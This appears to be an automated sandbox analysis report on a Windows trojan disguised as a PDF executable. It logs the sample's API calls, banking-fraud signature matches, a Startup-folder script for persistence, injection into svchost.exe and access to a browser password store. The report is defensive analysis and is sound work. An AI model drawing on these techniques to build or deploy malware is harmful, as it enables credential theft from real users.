                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_00382B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00382B37
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_003AF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_003AF7FF
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D4F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_00D4F7FF

                    E-Banking Fraud

                    Source: Yara match | File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000A.00000002.3082710229.0000000002250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000002.2341433295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.2332196683.0000000006140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000A.00000002.3082947555.0000000002700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000A.00000002.3082882435.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.3083758728.0000000002A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.2322322646.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.2321538525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.3084135785.0000000003730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                    System Summary

                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: This is a third-party compiled AutoIt script. 0_2_00343D19
                    Source: 5674656777985-069688574654 pdf.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: 5674656777985-069688574654 pdf.exe, 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. memstr_6022484a-7
                    Source: 5674656777985-069688574654 pdf.exe, 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: 7SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_f88ba2cd-d
                    Source: 5674656777985-069688574654 pdf.exe, 00000000.00000003.1835246280.000000000367D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. memstr_a862dfd8-4
                    Source: 5674656777985-069688574654 pdf.exe, 00000000.00000003.1835246280.000000000367D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_8095573e-2
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: This is a third-party compiled AutoIt script. 1_2_00CE3D19
                    Source: cunila.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: cunila.exe, 00000001.00000002.1860102558.0000000000D8E000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. memstr_9fe21cb6-7
                    Source: cunila.exe, 00000001.00000002.1860102558.0000000000D8E000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_25ac0c83-9
                    Source: cunila.exe, 00000004.00000000.1963487609.0000000000D8E000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. memstr_ca6c87a2-1
                    Source: cunila.exe, 00000004.00000000.1963487609.0000000000D8E000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_0156bbd1-e
                    Source: 5674656777985-069688574654 pdf.exe | String found in binary or memory: This is a third-party compiled AutoIt script. memstr_f98989e4-e
                    Source: 5674656777985-069688574654 pdf.exe | String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_2e3a6f9d-9
                    Source: cunila.exe.0.dr | String found in binary or memory: This is a third-party compiled AutoIt script. memstr_6dbe4407-5
                    Source: cunila.exe.0.dr | String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_8c4a63cb-0
                    Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042CD93 NtClose,2_2_0042CD93
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272B60 NtClose,LdrInitializeThunk,2_2_03272B60
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03272DF0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03272C70
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032735C0 NtCreateMutant,LdrInitializeThunk,2_2_032735C0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03274340 NtSetContextThread,2_2_03274340
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03274650 NtSuspendThread,2_2_03274650
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272BA0 NtEnumerateValueKey,2_2_03272BA0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272B80 NtQueryInformationFile,2_2_03272B80
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272BE0 NtQueryValueKey,2_2_03272BE0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272BF0 NtAllocateVirtualMemory,2_2_03272BF0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272AB0 NtWaitForSingleObject,2_2_03272AB0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272AF0 NtWriteFile,2_2_03272AF0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272AD0 NtReadFile,2_2_03272AD0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272F30 NtCreateSection,2_2_03272F30
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272F60 NtCreateProcessEx,2_2_03272F60
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272FA0 NtQuerySection,2_2_03272FA0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272FB0 NtResumeThread,2_2_03272FB0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272F90 NtProtectVirtualMemory,2_2_03272F90
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272FE0 NtCreateFile,2_2_03272FE0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272E30 NtWriteVirtualMemory,2_2_03272E30
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272EA0 NtAdjustPrivilegesToken,2_2_03272EA0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272E80 NtReadVirtualMemory,2_2_03272E80
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272EE0 NtQueueApcThread,2_2_03272EE0
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272D30 NtUnmapViewOfSection,2_2_03272D30
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03272D00 NtSetInformationFile,2_2_03272D00
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D10 NtMapViewOfSection,2_2_03272D10
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DB0 NtEnumerateKey,2_2_03272DB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DD0 NtDelayExecution,2_2_03272DD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C00 NtQueryInformationProcess,2_2_03272C00
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C60 NtCreateKey,2_2_03272C60
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CA0 NtQueryInformationToken,2_2_03272CA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CF0 NtOpenProcess,2_2_03272CF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CC0 NtQueryVirtualMemory,2_2_03272CC0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273010 NtOpenDirectoryObject,2_2_03273010
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273090 NtSetValueKey,2_2_03273090
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032739B0 NtGetContextThread,2_2_032739B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273D10 NtOpenProcessToken,2_2_03273D10
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273D70 NtOpenThread,2_2_03273D70
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00386606: CreateFileW,DeviceIoControl,CloseHandle,0_2_00386606
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0037ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_0037ACC5
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_003879D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_003879D3
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D279D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_00D279D3
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03287E54 appears 107 times
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03275130 appears 58 times
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0322B970 appears 262 times
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 032AEA12 appears 86 times
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 032BF290 appears 103 times
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: String function: 00366AC0 appears 42 times
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: String function: 0036F8A0 appears 35 times
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: String function: 0035EC2F appears 68 times
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: String function: 00D0F8A0 appears 35 times
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: String function: 00D06AC0 appears 42 times
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: String function: 00CFEC2F appears 68 times
                    Source: 5674656777985-069688574654 pdf.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@14/7@5/5
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0038CE7A GetLastError,FormatMessageW,0_2_0038CE7A
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0037AB84 AdjustTokenPrivileges,CloseHandle,0_2_0037AB84
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0037B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0037B134
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D1AB84 AdjustTokenPrivileges,CloseHandle,1_2_00D1AB84
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Code function: 1_2_00D1B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,1_2_00D1B134
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0038E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0038E1FD
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_00386532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00386532
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0039C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0039C18C
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Code function: 0_2_0034406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_0034406B
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | File created: C:\Users\user\AppData\Local\retrofit
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | File created: C:\Users\user\AppData\Local\Temp\autE4DE.tmp
                    Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs"
                    Source: 5674656777985-069688574654 pdf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: upnpcont.exe, 0000000A.00000002.3083101418.00000000028E0000.00000004.00000020.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000003.2511145084.00000000028BF000.00000004.00000020.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000003.2511278382.00000000028E0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: 5674656777985-069688574654 pdf.exe | ReversingLabs: Detection: 76%
                    Source: 5674656777985-069688574654 pdf.exe | Virustotal: Detection: 55%
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | File read: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe"
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Process created: C:\Users\user\AppData\Local\retrofit\cunila.exe "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe"
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe"
                    Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs"
                    Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\retrofit\cunila.exe "C:\Users\user\AppData\Local\retrofit\cunila.exe"
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\retrofit\cunila.exe"
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe | Process created: C:\Windows\SysWOW64\upnpcont.exe "C:\Windows\SysWOW64\upnpcont.exe"
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Section loaded: wsock32.dll
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Section loaded: winmm.dll
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Section loaded: mpr.dll
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Section loaded: ntmarta.dll
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exe | Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: wininet.dll
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: ieframe.dll
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: netapi32.dll
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: wkscli.dll
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: mlang.dll
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\upnpcont.exe | Section loaded: winsqlite3.dll
